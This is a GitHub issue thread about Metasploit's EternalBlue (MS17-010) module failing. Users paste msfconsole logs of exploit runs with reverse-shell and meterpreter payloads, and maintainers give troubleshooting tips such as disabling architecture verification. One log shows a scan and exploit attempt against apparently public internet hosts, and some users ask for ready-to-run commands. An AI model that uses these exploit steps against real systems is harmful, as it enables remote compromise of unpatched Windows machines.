Metasploit-framework: eternalblue exploit issue

Created on 29 May 2017 · 20Comments · Source: rapid7/metasploit-framework

msf exploit(ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.226.128:4444 
[*] 10.10.10.1:445 - Connecting to target for exploitation.
[+] 10.10.10.1:445 - Connection established for exploitation.
[*] 10.10.10.1:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.1:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.1:445 - Starting non-paged pool grooming
[+] 10.10.10.1:445 - Sending SMBv2 buffers
[+] 10.10.10.1:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.1:445 - Sending final SMBv2 buffers.
[*] 10.10.10.1:445 - Sending last fragment of exploit packet!
[*] 10.10.10.1:445 - Receiving response from exploit packet
[-] 10.10.10.1:445 - NoMethodError
[-] 10.10.10.1:445 - undefined method `[]' for nil:NilClass
[-] 10.10.10.1:445 - /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:293:in `smb1_get_response'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:188:in `smb_eternalblue'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:99:in `block in exploit'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.8/lib/active_support/core_ext/range/each.rb:7:in `each'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.8/lib/active_support/core_ext/range/each.rb:7:in `each_with_time_with_zone'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb:95:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:206:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:167:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:136:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:161:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:110:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:430:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:392:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:386:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:205:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:48:in `<main>'
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > exit

OS

What OS are you running Metasploit on?

kali 2017

Source

italy2010

Most helpful comment

@amster699 I fixed it by wrapping your console output in ```.

h00die on 13 Jun 2017

👍2 👎1

All 20 comments

Do you have any additional info on the target machine? (arch, windows version, etc.)

cbrnrd on 29 May 2017

Same issue, on both Windows 7 enterprise build 7601 SP1 and Windows 8.1 enterprise build 9600 no SP. On launching the exploit Windows 7 throws a blue screen immediately and Windows 8 does nothing.

mlshore on 30 May 2017

This should have been fixed in #8399

We can tell this example doesn't have #8399 because there is no "CORE buffer dump" for the banner string.

@mlshore we should expect opposite behavior, i.e. 8 crashes as we haven't put those offsets in the module yet

zerosum0x0 on 30 May 2017

msf exploit(ms17_010_eternalblue) > use  auxiliary/scanner/smb/smb_ms17_010 
msf auxiliary(smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      445              yes       The SMB service port (TCP)
   SMBDomain  .                no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser                     no        The username to authenticate as
   THREADS    1                yes       The number of concurrent threads

msf auxiliary(smb_ms17_010) > set rhosts 196.***.***.***
rhosts => 196.***.***.***
msf auxiliary(smb_ms17_010) > run

[-] 196.***.***.***:445      - Host does NOT appear vulnerable.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) > set rhosts 82.***.***.***
rhosts => 82.***.***.***
msf auxiliary(smb_ms17_010) > run

[+] 82.***.***.***:445    - Host is likely VULNERABLE to MS17-010!  (Windows Server (R) 2008 Standard 6002 Service Pack 2)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 82.***.***.***
rhost => 82.***.***.***
msf exploit(ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST               82.***.***.***   yes       The target address
   RPORT               445              yes       The target port (TCP)
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.***.***.***    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.***.***.***:4444 
[*] 82.***.***.***:445 - Connecting to target for exploitation.
[+] 82.***.***.***:445 - Connection established for exploitation.
[!] 82.***.***.***:445 - Target OS selected not valid for OS indicated by SMB reply
[!] 82.***.***.***:445 - Disable VerifyTarget option to proceed manually...
[*] 82.***.***.***:445 - CORE raw buffer dump (37 bytes)
[*] 82.***.***.***:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 28  Windows Server (
[*] 82.***.***.***:445 - 0x00000010  52 29 20 32 30 30 38 20 53 74 61 6e 64 61 72 64  R) 2008 Standard
[*] 82.***.***.***:445 - 0x00000020  20 36 2e 30 00                                    6.0           
[-] 82.***.***.***:445 - Unable to continue with improper OS Target.
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.***.***.***:4444 
[*] 82.***.***.***:445 - Connecting to target for exploitation.
[+] 82.***.***.***:445 - Connection established for exploitation.
[!] 82.***.***.***:445 - Target OS selected not valid for OS indicated by SMB reply
[!] 82.***.***.***:445 - Disable VerifyTarget option to proceed manually...
[*] 82.***.***.***:445 - CORE raw buffer dump (37 bytes)
[*] 82.***.***.***:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 28  Windows Server (
[*] 82.***.***.***:445 - 0x00000010  52 29 20 32 30 30 38 20 53 74 61 6e 64 61 72 64  R) 2008 Standard
[*] 82.***.***.***:445 - 0x00000020  20 36 2e 30 00                                    6.0           
[-] 82.***.***.***:445 - Unable to continue with improper OS Target.
[*] Exploit completed, but no session was created.
msf exploit(ms17_010_eternalblue) >

I hope this could help
(metasploit v4.14.22-dev)

drimaed on 2 Jun 2017

@drimaed The target OS might be 32 bit. The module in MSF tree right now only target x64 as you can see from the show targets option.

void-in on 2 Jun 2017

@drimaed The target could possibly be 64-bit. The problem here is the kernel version is 6002, meaning it is not Server 2008 R2.

Server 2008 is based on Vista. Server 2008 R2 is Windows 7.

Vista is not currently supported.

zerosum0x0 on 2 Jun 2017

👍1

hey bro how can i fix this ??
let me now if you can help thanks

msf auxiliary(smb_ms17_010) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms17_010) >

amster699 on 13 Jun 2017

@amster699 I fixed it by wrapping your console output in ```.

h00die on 13 Jun 2017

👍2 👎1

sorry brother did not understand very well wat you meaning..
can you explain bether?
thanks

amster699 on 13 Jun 2017

should i have also port 4444 enabled right?

amster699 on 13 Jun 2017

if you can leave here the comands i should use for that i will stay very thankfull brother thanks

amster699 on 13 Jun 2017

closing in favor of #8835

busterb on 29 Aug 2017

I know this is closed, but would like to add the architecture is wrong on the target system is 2008 standard, needs to be 2008 R2.

d1g1taltor on 30 Jan 2018

I ask
is it possible if exploit eternalblue outside our wifi?

jordan12121 on 30 Jun 2018

The same issue. Pls check for me.

msf exploit(windows/smb/ms17_010_eternalblue) > options

Module options (exploit/windows/smb/ms17_010_eternalblue):

Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST 172.168.22.156 yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.168.22.134 yes The listen address (an interface may be specified)
LPORT 445 yes The listen port

Exploit target:

Id Name

0 Windows 7 and Server 2008 R2 (x64) All Service Packs

msf exploit(windows/smb/ms17_010_eternalblue) > run

[] Started reverse TCP handler on 172.168.22.134:445
[] 172.168.22.156:445 - Connecting to target for exploitation.
[+] 172.168.22.156:445 - Connection established for exploitation.
[+] 172.168.22.156:445 - Target OS selected valid for OS indicated by SMB reply
[] 172.168.22.156:445 - CORE raw buffer dump (40 bytes)
[] 172.168.22.156:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42 Windows 7 Home B
[] 172.168.22.156:445 - 0x00000010 61 73 69 63 20 37 36 30 31 20 53 65 72 76 69 63 asic 7601 Servic
[] 172.168.22.156:445 - 0x00000020 65 20 50 61 63 6b 20 31 e Pack 1
[!] 172.168.22.156:445 - Target arch is x64, but server returned "x86"
[!] 172.168.22.156:445 - Target arch selected not valid for arch indicated by DCE/RPC reply
[!] 172.168.22.156:445 - Disable VerifyArch option to proceed manually...
[-] 172.168.22.156:445 - Unable to continue with improper OS Arch.
[*] Exploit completed, but no session was created.
msf exploit(windows/smb/ms17_010_eternalblue) >

Hugovn on 15 Jul 2018

@Hugovn this issue is closed please create a new issue.

That said, the output suggests that the target is x86 not x64. Have you tried set VerifyArch false ?

[!] 172.168.22.156:445 - Target arch is x64, but server returned "x86"
[!] 172.168.22.156:445 - Target arch selected not valid for arch indicated by DCE/RPC reply
[!] 172.168.22.156:445 - Disable VerifyArch option to proceed manually...
[-] 172.168.22.156:445 - Unable to continue with improper OS Arch.

bcoles on 15 Jul 2018

hi guys i have this problem after pos-explotation
msf exploit(ms17_010_eternalblue) > run

[] Started reverse TCP handler on 10.10.14.247:4445
[] 127.0.0.1:445 - Connecting to target for exploitation.
[-] 127.0.0.1:445 - Could not make SMBv1 connection
[*] Exploit completed, but no session was created.

K4bl0-Skat3R on 4 Nov 2018

I met the same question. timeout

ykla on 4 Mar 2019

Hello guys Help!
auxiliary scanner does not check if target is vulnerable or not :- see below

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description

CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.xx.xxx
rhosts => 192.168.xx.xxx
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description

CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 192.168.xx.xxx yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[] 192.168.xx.xxx:445 - Scanned 1 of 1 hosts (100% complete)
[] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) >

MrNikhil06 on 6 Sep 2019

455 not open

Pada tanggal 6 Sep 2019 14:26, "Nikhil672" notifications@github.com
menulis:

Hello guys Help!
auxiliary scanner does not check if target is vulnerable or not :- see
below

msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description

CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt
yes List of named pipes to check
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.xx.xxx
rhosts => 192.168.xx.xxx
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name Current Setting Required Description

CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt
yes List of named pipes to check
RHOSTS 192.168.xx.xxx yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[] 192.168.xx.xxx:445 - Scanned 1 of 1 hosts (100% complete)
[] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) >

—
You are receiving this because you commented.
Reply to this email directly, view it on GitHub
https://github.com/rapid7/metasploit-framework/issues/8477?email_source=notifications&email_token=AJMTK6IAP5BOPVTFZL6JLZTQIIAZLA5CNFSM4DNEU5BKYY3PNVWWK3TUL52HS4DFVREXG43VMVBW63LNMVXHJKTDN5WW2ZLOORPWSZGOD6B7ZVQ#issuecomment-528743638,
or mute the thread
https://github.com/notifications/unsubscribe-auth/AJMTK6MWA2G3GSKANIKVPG3QIIAZLANCNFSM4DNEU5BA
.